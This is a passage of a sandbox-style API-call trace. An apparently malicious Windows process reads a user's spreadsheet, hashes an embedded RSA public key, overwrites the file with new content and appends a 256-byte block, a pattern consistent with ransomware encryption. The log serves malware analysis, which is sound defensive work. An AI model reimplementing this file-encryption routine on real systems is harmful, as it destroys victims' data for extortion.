ftCreationTime.dwLowDateTime=0xe3b99d20, ftCreationTime.dwHighDateTime=0x1d86ff6, ftLastAccessTime.dwLowDateTime=0xce3ee880, ftLastAccessTime.dwHighDateTime=0x1d87030, ftLastWriteTime.dwLowDateTime=0xce3ee880, ftLastWriteTime.dwHighDateTime=0x1d87030, nFileSizeHigh=0x0, nFileSizeLow=0xc4fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vPMkP.xlsx", cAlternateFileName="VPMKP~1.XLS")) returned 1 [0184.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38718 [0184.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6fdf8 [0184.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38718 | out: hHeap=0x6a0000) returned 1 [0184.971] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\vPMkP.xlsx") returned=".xlsx" [0184.971] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\vPMkP.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\vpmkp.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.971] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=50428) returned 1 [0184.971] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0184.974] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xc4d6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.974] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0184.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.977] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.977] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xc4fc, lpOverlapped=0x0) returned 1 [0184.978] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0184.978] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.978] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.978] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0184.979] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0184.979] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.979] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0184.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0184.980] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0184.980] GetLastError () returned 0x0 [0184.980] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0184.980] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0184.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0184.980] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0184.980] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0184.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.980] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0184.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc500) returned 0x2d43778 [0184.981] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0184.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0184.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0184.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38718 [0184.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea38 [0184.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38760 [0184.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea50 [0184.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea80 [0184.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eae0 [0184.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea98 [0184.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0184.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0184.982] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0184.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0184.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea80 | out: hHeap=0x6a0000) returned 1 [0184.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea98 | out: hHeap=0x6a0000) returned 1 [0184.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0184.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0184.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0184.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eae0 [0184.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0184.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea98 [0184.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4ea80 [0184.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0184.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0184.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0184.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0184.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0184.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0184.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea98 | out: hHeap=0x6a0000) returned 1 [0184.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea80 | out: hHeap=0x6a0000) returned 1 [0184.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0184.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0184.985] GetCurrentThreadId () returned 0x264 [0184.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0184.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d37258 [0184.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0184.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0184.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0184.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0184.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.985] GetCurrentThreadId () returned 0x264 [0184.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0184.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0184.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82bc0 [0184.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0184.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eae0 [0184.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0184.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0184.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0184.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea80 [0184.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0184.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0184.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0184.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0184.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea98 [0184.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0184.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0184.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea68 [0184.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0184.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eaf8 [0184.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0184.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eac8 [0184.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eab0 [0184.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eb10 [0184.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eab0 | out: hHeap=0x6a0000) returned 1 [0184.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eab0 [0184.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eac8 | out: hHeap=0x6a0000) returned 1 [0184.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0184.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0184.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0184.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea80 | out: hHeap=0x6a0000) returned 1 [0184.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea80 [0184.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0184.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0184.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0184.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb10 | out: hHeap=0x6a0000) returned 1 [0184.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0184.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0184.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0184.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea80 | out: hHeap=0x6a0000) returned 1 [0184.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0184.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0184.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0184.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0184.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0184.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0184.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0184.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0184.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eab0 | out: hHeap=0x6a0000) returned 1 [0184.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0184.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea98 | out: hHeap=0x6a0000) returned 1 [0184.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea68 | out: hHeap=0x6a0000) returned 1 [0184.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea50 | out: hHeap=0x6a0000) returned 1 [0184.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38760 | out: hHeap=0x6a0000) returned 1 [0184.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82bc0 | out: hHeap=0x6a0000) returned 1 [0184.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.998] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0xc4f7, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0xc4f7, lpOverlapped=0x0) returned 1 [0184.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0184.999] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xc4fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.999] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0184.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0184.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0185.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0185.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: 